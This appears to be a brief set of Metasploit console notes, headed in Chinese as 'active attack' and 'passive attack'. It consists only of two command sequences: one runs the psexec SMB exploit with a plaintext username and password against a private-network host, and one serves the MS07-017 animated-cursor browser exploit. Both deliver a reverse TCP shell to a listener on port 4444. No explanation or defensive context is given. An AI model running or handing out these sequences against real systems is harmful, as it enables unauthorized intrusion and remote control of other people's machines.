主动攻击
– use exploit/windows/smb/psexec– set RHOST 192.168.1.100– set PAYLOAD windows/shell/reverse_tcp– set LHOST 192.168.1.1– set LPORT 4444– set SMBUSER user1– set SMBPASS pass1– exploit
被动攻击
– use exploit/windows/browser/ms07_017_ani_loadimage_chunksize– set URIPATH /– set PAYLOAD windows/shell/reverse_tcp– set LHOST 192.168.1.1– set LPORT 4444– exploit
